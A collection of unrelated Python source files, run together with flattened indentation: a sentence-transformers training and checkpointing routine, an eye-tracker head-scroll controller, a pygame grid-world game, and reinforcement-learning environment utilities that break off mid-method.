self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
loss_list = []
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
loss_list.append(loss_value.item())
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_list.append(loss_value.item())
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
print(f"Training Loss: {np.mean(loss_list): .4f}")
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logger.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
if os.path.exists(model_card_path):
try:
with open(model_card_path, encoding='utf8') as fIn:
self._model_card_text = fIn.read()
except:
pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
_head_scroll.py | import threading
import time
from collections import deque
class ScrollState:
NOT_SCROLLING = 1
SCROLLING_DOWN = 2
SCROLLING_UP = 3
class Scroller(object):
def __init__(self,
eye_tracker,
mouse,
coefs=[-0.17, -0.082, -0.0025, 0.00072],
gaze_alignment_threshold=0.1,
misaligned_pitch_velocity_threshold=0.05,
stop_threshold=0.1,
shake_threshold=0.4,
check_frequency=20,
scroll_frequency=5,
smooth_frequency=10):
"""Note: check_frequency must be a multiple of scroll_frequency and
smooth_frequency.
"""
self.eye_tracker = eye_tracker
self.mouse = mouse
self.coefs = coefs
self.gaze_alignment_threshold = gaze_alignment_threshold
self.misaligned_pitch_velocity_threshold = misaligned_pitch_velocity_threshold
self.stop_threshold = stop_threshold
self.shake_threshold = shake_threshold
self.check_frequency = check_frequency
self.scroll_frequency = scroll_frequency
self.smooth_frequency = smooth_frequency
self._stop_event = None
# For visualization.
self.gaze = (0, 0)
self.rotation = (0, 0, 0)
self.smooth_pitch = 0
self.pitch_velocity = 0
self.yaw_velocity = 0
self.expected_pitch = 0
self.pinned_pitch = 0
self.min_pitch = 0
self.max_pitch = 0
self.is_scrolling = False
def start(self):
if self._stop_event:
return
# Move cursor so we scroll in the right window.
start_gaze = self.eye_tracker.get_gaze_point_or_default()
self.mouse.move((round(start_gaze[0]), round(start_gaze[1])))
stop_event = threading.Event()
thread = threading.Thread(target=lambda: self._run(stop_event))
thread.setDaemon(True)
thread.start()
self._stop_event = stop_event
def stop(self):
if not self._stop_event:
return
self._stop_event.set()
self._stop_event = None
def _run(self, stop_event):
check_period = 1.0 / self.check_frequency
scroll_period_count = 0
scroll_multiple = self.check_frequency // self.scroll_frequency
smooth_multiple = self.check_frequency // self.smooth_frequency
smooth_period = 1.0 / self.smooth_frequency
recent_rotations = deque(maxlen=smooth_multiple)
rotation = self.eye_tracker.get_head_rotation_or_default()
recent_rotations.append(rotation)
smooth_pitch = rotation[0] / smooth_multiple
pinned_pitch = rotation[0]
recent_gaze = deque(maxlen=smooth_multiple)
gaze = self.eye_tracker.get_gaze_point_or_default()
recent_gaze.append(gaze)
smooth_gaze = (gaze[0] / smooth_multiple, gaze[1] / smooth_multiple)
state = ScrollState.NOT_SCROLLING
while not stop_event.is_set():
time.sleep(check_period)
rotation = self.eye_tracker.get_head_rotation_or_default()
head_position = self.eye_tracker.get_head_position_or_default()
gaze = self.eye_tracker.get_gaze_point_or_default()
smooth_pitch += rotation[0] / smooth_multiple
smooth_gaze = (smooth_gaze[0] + gaze[0] / smooth_multiple,
smooth_gaze[1] + gaze[1] / smooth_multiple)
if len(recent_rotations) == smooth_multiple:
smooth_pitch -= recent_rotations[0][0] / smooth_multiple
smooth_gaze = (smooth_gaze[0] - recent_gaze[0][0] / smooth_multiple,
smooth_gaze[1] - recent_gaze[0][1] / smooth_multiple)
pitch_velocity = (rotation[0] - recent_rotations[0][0]) / smooth_period
yaw_velocity = (rotation[1] - recent_rotations[0][1]) / smooth_period
# Update thresholds based on gaze if not scrolling.
if state == ScrollState.NOT_SCROLLING:
monitor_size = self.eye_tracker.get_monitor_size()
expected_pitch = (self.coefs[0] +
self.coefs[1] * (smooth_gaze[1] / monitor_size[1]) +
self.coefs[2] * head_position[1] +
self.coefs[3] * head_position[2])
if not(pinned_pitch < expected_pitch and smooth_pitch < pinned_pitch or
pinned_pitch > expected_pitch and smooth_pitch > pinned_pitch):
# Eye and gaze movements are aligned, so we keep pitch in bounds.
# This allows pitch to lag gaze.
pinned_pitch = smooth_pitch
min_pitch = min(expected_pitch - self.gaze_alignment_threshold,
pinned_pitch - self.misaligned_pitch_velocity_threshold)
max_pitch = max(expected_pitch + self.gaze_alignment_threshold,
pinned_pitch + self.misaligned_pitch_velocity_threshold)
# Update state.
if smooth_pitch > max_pitch:
state = ScrollState.SCROLLING_UP
elif smooth_pitch < min_pitch:
state = ScrollState.SCROLLING_DOWN
else:
if state != ScrollState.NOT_SCROLLING:
# Reset pinned pitch so we don't start scrolling again.
pinned_pitch = smooth_pitch
state = ScrollState.NOT_SCROLLING
# if abs(yaw_velocity) > self.shake_threshold:
# pinned_pitch = smooth_pitch
# state = ScrollState.NOT_SCROLLING
# Perform scrolling. Pause if pitch is moving in the wrong direction.
is_scrolling = False
if state == ScrollState.SCROLLING_UP and pitch_velocity > -self.stop_threshold:
if scroll_period_count == 0:
speed = 2 ** round((smooth_pitch - max_pitch) / self.gaze_alignment_threshold)
self.mouse.scroll_up(speed)
scroll_period_count = (scroll_period_count + 1) % scroll_multiple
is_scrolling = True
elif state == ScrollState.SCROLLING_DOWN and pitch_velocity < self.stop_threshold:
if scroll_period_count == 0:
speed = 2 ** round((min_pitch - smooth_pitch) / self.gaze_alignment_threshold)
self.mouse.scroll_down(speed)
scroll_period_count = (scroll_period_count + 1) % scroll_multiple
is_scrolling = True
else:
scroll_period_count = 0
# Snapshot variables for visualization.
self.gaze = smooth_gaze
self.rotation = rotation
self.smooth_pitch = smooth_pitch
self.pitch_velocity = pitch_velocity
self.yaw_velocity = yaw_velocity
self.expected_pitch = expected_pitch
self.pinned_pitch = pinned_pitch
self.min_pitch = min_pitch
self.max_pitch = max_pitch
self.is_scrolling = is_scrolling
recent_rotations.append(rotation)
recent_gaze.append(gaze)
|
game.py | import numpy as np
import matplotlib.pyplot as plt
import pygame as pg
import os
import threading
from rlgw.model import WORLD, ENV
pg.init() # load pygame modules
#~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~#
# Game Module for Grid-World
# Implements graphics and most of pygame related subs
#~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~#
class GAME:
def __init__(self, env, print_scores=False):
self.env = env
self.R, self.C = self.env.R, self.env.C
self.print_scores=print_scores
# -for- pygame
# size
self.size_ratio = 50 # ratio of each cell size
self.line_width = 2 # linewidth for gridlines
self.width = self.C*self.size_ratio # Window width
self.height = self.R*self.size_ratio # Window height
# images
self_art_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)) , 'art')
self.agent_img = pg.image.load(os.path.join(self_art_dir, 'agent.png'))
self.posf_image = pg.image.load(os.path.join(self_art_dir, 'posf.png'))
self.posi_image = pg.image.load( os.path.join(self_art_dir, 'posi.png'))
# coordinate mapper
ax, ay = self.agent_img.get_size()
self.dx, self.dy = (self.size_ratio-ax)/2, (self.size_ratio-ay)/2
self.mpos=128/self.env.world.RRP[1]
self.mneg=128/self.env.world.RRN[0]
# colors
self.empty_col=(255,255,255)
self.end_col=(255,255,0)
self.linec=(0,0,0)
self.bgcol=(0,50,100)
self.hlast = {}
self.reset_hlast()
self.hrender = True
self.font_family = 'consolas'
self.font_size = int( 2.5*(self.C) )
return
def reset_hlast(self):
self.hlast['tr'] = 0
self.hlast['r'] = 0
self.hlast['d'] = False
self.hlast['ts'] = 0
self.score_str = "[Score] | Steps : [0] | 0"
return
def update_hlast(self, total_rew, reward, done, steps):
self.hlast['tr'] = total_rew
self.hlast['r'] = reward
self.hlast['d'] = done
self.hlast['ts'] = steps
self.score_str = "[Score] | Steps : ["+str(total_rew) + "] | "+str(steps)
return
def make_screen(self):
""" Create game screen {OTC} """
self.reset_hlast()
# define font
# SysFont(name, size, bold=False, italic=False)
self.font = pg.font.SysFont(self.font_family, min(self.font_size, 20 )) # after pygame is initialized
# create a window or screen (pygame.display)
self.screen = pg.display.set_mode(
(self.width + self.line_width, self.height + self.line_width + self.size_ratio)) # screen display object
self.screen.fill(self.bgcol) # fill back ground color
pg.display.set_caption(self.env.name)
self.show_lines() # create grid-lines ( one time call )
self.show_grid() # create grid-cells ( one time call )
pg.display.update()
return
def show_lines(self):
""" Draw the grid lines {OTC} """
GRID = self.env.GRIDbox
for i in range(self.R):
for j in range(self.C):
# vertical lines
pg.draw.line(self.screen,
color=self.linec,
start_pos=(j*self.size_ratio, 0),
end_pos=(j*self.size_ratio, self.height),
width=self.line_width)
# end for (j)
# last vertical line
pg.draw.line(self.screen,
color=self.linec,
start_pos=((j+1)*self.size_ratio, 0),
end_pos=((j+1)*self.size_ratio,
self.height),
width=self.line_width)
# horizontal lines
pg.draw.line(self.screen,
color=self.linec,
start_pos=(0, i*self.size_ratio),
end_pos=(self.width, i*self.size_ratio),
width=self.line_width)
# end for (i)
# last horizontal line
pg.draw.line(self.screen,
color=self.linec,
start_pos=(0, (i+1)*self.size_ratio),
end_pos=(self.width, (i+1)*self.size_ratio),
width=self.line_width)
return
def show_grid(self):
""" Draw the grid cells {OTC} """
GRID = self.env.GRIDbox
for i in range(self.R):
for j in range(self.C):
if GRID[i,j]==self.env.world.ER:
colx= self.end_col
elif GRID[i,j]==self.env.world.EMPTY:
colx= self.empty_col
elif GRID[i,j]<0:
colx= (int(255-(GRID[i,j])*self.mneg),0,64)
else:
colx= (0, int(255-(GRID[i,j])*self.mpos), 64)
pg.draw.rect(self.screen, colx, pg.Rect( j*self.size_ratio+self.line_width, i*self.size_ratio+self.line_width,
self.size_ratio-self.line_width*2, self.size_ratio-self.line_width*2))
def make_update(self):
self.update_grid()
self.update_history()
self.update_agent()
self.update_score()
pg.display.update()
return
def update_score(self):
# redraw background
pg.draw.rect(self.screen, self.bgcol,
pg.Rect(self.line_width,
self.R*self.size_ratio+self.line_width,
self.width-self.line_width*2,
self.size_ratio-self.line_width*2))
# display text using render(text, antialias, color, background=None)
img_score = self.font.render(self.score_str, 1, self.empty_col, self.bgcol)
self.screen.blit(img_score, (self.size_ratio/2, (self.R)*self.size_ratio+self.size_ratio/2))
#img_reward = self.font.render("Steps: "+str(self.hlast['ts']), 1, self.empty_col, self.bgcol)
#self.screen.blit(img_reward, (self.size_ratio*3+self.size_ratio/2, (self.R)*self.size_ratio+self.size_ratio/2))
def update_agent(self):
self.screen.blit(self.agent_img, (self.env.POS[1]*self.size_ratio+self.dy, self.env.POS[0]*self.size_ratio+self.dx))
self.screen.blit(self.posi_image, (self.env.POSi[1]*self.size_ratio+self.dy, self.env.POSi[0]*self.size_ratio+self.dx))
self.screen.blit(self.posf_image, (self.env.POSF[1]*self.size_ratio+self.dy, self.env.POSF[0]*self.size_ratio+self.dx))
def update_grid(self):
GRID = self.env.GRIDbox
posL= [(self.env.POS[0], self.env.POS[1]),
(self.env.history[-1][0],self.env.history[-1][1]),] # only update the grid cells that changed - env.history will always have 1 item
for i,j in posL:
if GRID[i,j]==self.env.world.ER:
colx= self.end_col
elif GRID[i,j]==self.env.world.EMPTY:
colx= self.empty_col
elif GRID[i,j]<0:
colx= (int(255-(GRID[i,j])*self.mneg),0, 64)
else:
colx= (0, int(255-(GRID[i,j])*self.mpos), 64)
# redraw cells
pg.draw.rect(self.screen, colx, pg.Rect( j*self.size_ratio+self.line_width, i*self.size_ratio+self.line_width,
self.size_ratio-self.line_width*2, self.size_ratio-self.line_width*2))
# draw the last move
pg.draw.line(self.screen, color=self.end_col,
start_pos=(posL[0][1]*self.size_ratio+self.size_ratio/2, posL[0][0]*self.size_ratio+self.size_ratio/2),
end_pos=(posL[1][1]*self.size_ratio+self.size_ratio/2, posL[1][0]*self.size_ratio+self.size_ratio/2),
width=1)
def update_history(self):
if self.hrender: # render history of moves (except for the most recent move that is displayed in update_grid())
if len(self.env.history)>1:
hist = np.array(self.env.history) * self.size_ratio + self.size_ratio/2
hist[:,[0, 1]] = hist[:,[1, 0]]
pg.draw.lines(self.screen, color=self.bgcol, closed=False, points=hist)
def main(self):
""" main game loop - run in a seprate thread/process and read the hlast dict for scores """
# perpare
self.env.reset()
steps, total_rew, done = 0,0, self.env.in_done()
self.make_screen() # will call pg.display.update()
going = True
while going:
# ~ Check Events
for event in pg.event.get():
if event.type == pg.QUIT:
going = False
else:
if event.type == pg.KEYDOWN:
# any keypress to reset game in 'done' state
if event.key == pg.K_ESCAPE:
going = False
else:
if done:
self.env.reset()
steps,total_rew, done = 0,0, self.env.in_done()
self.make_screen()
else:
if event.key == pg.K_KP5:
a='XX'
elif event.key == pg.K_KP4:
a='WW'
elif event.key == pg.K_KP6:
a='EE'
elif event.key == pg.K_KP8:
a='NN'
elif event.key == pg.K_KP2:
a='SS'
elif event.key == pg.K_KP9:
a='NE'
elif event.key == pg.K_KP7:
a='NW'
elif event.key == pg.K_KP3:
a='SE'
elif event.key == pg.K_KP1:
a='SW'
else:
a=""
if a in self.env.adict:
#if a>=0: # only on valid actions
_, reward, done, _ = self.env.step(self.env.adict[a])
total_rew+=reward
steps+=1
self.update_hlast(total_rew, reward, done, steps) # update scores
if self.print_scores:
if done:
print(self.score_str)
if going:
self.make_update() # ~ Render
# ~ wait thread
# pg.time.wait(1)
# assert(going==False) #<-- test
pg.display.quit() # display quit here <-----------
# pg.quit() # unload pygame modules
return
def play():
""" Sample Game play in pygame window """
game = GAME(
env = ENV(
world = WORLD.get_world(
R=8, C=8,
SP=(0,0), EP=(5,5),
RNDSP=True, RNDEP=True,
EMPTY=-1, RRN=[-8,-2], RRP=[2,8],
RD=0.5, PRD=0.5, ER=0,
MAXTS=8*8*2,
SID=None,
name="rlgw.default.world"
),
actions=ENV.ACTIONS,
penalty=(False, 0), #<--- if True, imposes penalty on agent for staying in the same cell
always_reinit=True,
name="rlgw.default.env" #<--- if True, always choose a new random initial state from distribution
), print_scores=True)
th = threading.Thread(target=game.main)
th.start()
th.join()
print('Done!')
return |
utils.py | import csv
import json
import gym
import numpy as np
import tensorflow as tf
import os.path as osp
from gym.core import Wrapper
from multiprocessing import Process, Pipe
def sf01(arr):
"""
swap and then flatten axes 0 and 1
"""
s = arr.shape
return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])
def safemean(xs):
return np.nan if len(xs) == 0 else np.mean(xs)
def explained_variance(ypred,y):
"""
Computes fraction of variance that ypred explains about y.
Returns 1 - Var[y-ypred] / Var[y]
interpretation:
ev=0 => might as well have predicted zero
ev=1 => perfect prediction
ev<0 => worse than just predicting zero
"""
assert y.ndim == 1 and ypred.ndim == 1
vary = np.var(y)
return np.nan if vary==0 else 1 - np.var(y-ypred)/vary
def get_all_params(model):
params = []
for net in model:
params += net.all_params
return params
def tf_sum(x, axis=None, keepdims=False):
axis = None if axis is None else [axis]
return tf.reduce_sum(x, axis=axis, keep_dims=keepdims)
class Pd(object):
"""
A particular probability distribution
"""
def flatparam(self):
raise NotImplementedError
def mode(self):
raise NotImplementedError
def neglogp(self, x):
# Usually it's easier to define the negative logprob
raise NotImplementedError
def kl(self, other):
raise NotImplementedError
def entropy(self):
raise NotImplementedError
def sample(self):
raise NotImplementedError
def logp(self, x):
return - self.neglogp(x)
class PdType(object):
"""
Parametrized family of probability distributions
"""
def pdclass(self):
raise NotImplementedError
def pdfromflat(self, flat):
return self.pdclass()(flat)
def param_shape(self):
raise NotImplementedError
def sample_shape(self):
raise NotImplementedError
def sample_dtype(self):
raise NotImplementedError
def param_placeholder(self, prepend_shape, name=None):
return tf.placeholder(dtype=tf.float32, shape=prepend_shape+self.param_shape(), name=name)
def sample_placeholder(self, prepend_shape, name=None):
return tf.placeholder(dtype=self.sample_dtype(), shape=prepend_shape+self.sample_shape(), name=name)
class DiagGaussianPdType(PdType):
def __init__(self, size):
self.size = size
def pdclass(self):
return DiagGaussianPd
def param_shape(self):
return [2*self.size]
def sample_shape(self):
return [self.size]
def sample_dtype(self):
return tf.float32
class DiagGaussianPd(Pd):
def __init__(self, flat):
self.flat = flat
mean, logstd = tf.split(axis=len(flat.shape)-1, num_or_size_splits=2, value=flat)
self.mean = mean
self.logstd = logstd
self.std = tf.exp(logstd)
def flatparam(self):
return self.flat
def mode(self):
return self.mean
def neglogp(self, x):
return 0.5 * tf_sum(tf.square((x - self.mean) / self.std), axis=-1) \
+ 0.5 * np.log(2.0 * np.pi) * tf.to_float(tf.shape(x)[-1]) \
+ tf_sum(self.logstd, axis=-1)
def kl(self, other):
assert isinstance(other, DiagGaussianPd)
return tf_sum(other.logstd - self.logstd + (tf.square(self.std) + tf.square(self.mean - other.mean)) / (2.0 * tf.square(other.std)) - 0.5, axis=-1)
def entropy(self):
return tf_sum(self.logstd + .5 * np.log(2.0 * np.pi * np.e), axis=-1)
def sample(self):
return self.mean + self.std * tf.random_normal(tf.shape(self.mean))
@classmethod
def fromflat(cls, flat):
return cls(flat)
class VecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
self.action_space = env.action_space
self.observation_space = env.observation_space
self.ts = np.zeros(len(self.envs), dtype='int')
def step(self, action_n):
results = [env.step(a) for (a,env) in zip(action_n, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if done:
obs[i] = self.envs[i].reset()
self.ts[i] = 0
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def render(self):
return self.envs[0].render()
@property
def num_envs(self):
return len(self.envs)
class DummyVecTestEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
self.action_space = env.action_space
self.observation_space = env.observation_space
self.ts = np.zeros(len(self.envs), dtype='int')
def step(self, action_n):
results = [env.step(a) for (a,env) in zip(action_n, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def render(self):
return self.envs[0].render()
@property
def num_envs(self):
return len(self.envs)
class VecNormalize(VecEnv):
"""
Vectorized environment base class
"""
def __init__(self, venv, ob=True, ret=True, clipob=10., cliprew=10., gamma=0.99, epsilon=1e-8):
self.venv = venv
self._observation_space = self.venv.observation_space
self._action_space = venv.action_space
self.ob_rms = RunningMeanStd(shape=self._observation_space.shape) if ob else None
self.ret_rms = RunningMeanStd(shape=()) if ret else None
self.clipob = clipob
self.cliprew = cliprew
self.ret = np.zeros(self.num_envs)
self.gamma = gamma
self.epsilon = epsilon
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
obs, rews, news, infos = self.venv.step(vac)
self.ret = self.ret * self.gamma + rews
obs = self._obfilt(obs)
if self.ret_rms:
self.ret_rms.update(self.ret)
rews = np.clip(rews / np.sqrt(self.ret_rms.var + self.epsilon), -self.cliprew, self.cliprew)
return obs, rews, news, infos
def _obfilt(self, obs):
if self.ob_rms:
self.ob_rms.update(obs)
obs = np.clip((obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clipob, self.clipob)
return obs
else:
return obs
def reset(self):
"""
Reset all environments
"""
obs = self.venv.reset()
return self._obfilt(obs)
@property
def action_space(self):
return self._action_space
@property
def observation_space(self):
return self._observation_space
def close(self):
self.venv.close()
@property
def num_envs(self):
return self.venv.num_envs
class VecNormalizeTest(VecEnv):
def __init__(self, venv, mean, var, clipob=10., epsilon=1e-8):
self.venv = venv
self._observation_space = self.venv.observation_space
self._action_space = venv.action_space
self.mean = mean
self.var = var
self.clipob = clipob
self.epsilon = epsilon
def render(self):
return self.venv.render()
def step(self, vac):
obs, rews, dones, infos = self.venv.step(vac)
obs = self._obfilt(obs)
return obs, rews, dones, infos
def _obfilt(self, obs):
obs = np.clip((obs - self.mean) / np.sqrt(self.var + self.epsilon), -self.clipob, self.clipob)
return obs
def reset(self):
obs = self.venv.reset()
return self._obfilt(obs)
@property
def action_space(self):
return self._action_space
@property
def observation_space(self):
return self._observation_space
def close(self):
self.venv.close()
@property
def num_envs(self):
return self.venv.num_envs
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_space, env.observation_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
self.action_space, self.observation_space = self.remotes[0].recv()
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
for remote in self.remotes:
